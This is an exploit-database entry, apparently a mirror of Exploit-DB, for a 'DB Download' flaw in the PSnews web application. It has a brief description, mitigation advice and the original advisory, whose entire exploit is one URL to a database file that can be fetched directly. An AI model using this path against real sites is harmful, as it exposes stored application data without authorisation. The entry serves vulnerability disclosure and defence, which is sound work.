header-logo
Suggest Exploit
vendor:
PSnews
by:
indoushka
8.8
CVSS
HIGH
Database Download
532
CWE
Product Name: PSnews
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
2003

PSnews DB Download Vulnerability

The vulnerability allows an attacker to download the database of the PSnews application. The attacker can access the database by sending a request to the URL http://server/PSnews/PSnews_th3_d4t4b453.mdb.

Mitigation:

The application should be configured to prevent unauthorized access to the database files. Access control mechanisms should be implemented to ensure that only authorized users can access the database files.
Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : PSnews DB Download Vulnerability                                        |
| # Author   : indoushka                                                               |
| # email    : indoushka@hotmail.com                                                   |
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
| # Web Site : www.iq-ty.com                                                           |
| # Script   : PSnews - Copyright (C) 2003 Rich Kavanagh                               |
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
| # Bug      : DB                                                                      | 
======================      Exploit By indoushka       =================================
| # Exploit  : 
| 
| 1- http://server/PSnews/PSnews_th3_d4t4b453.mdb
|
================================   Dz-Ghost Team   ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * Redda * Mourad (dgsn.dz) * 
-------------------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR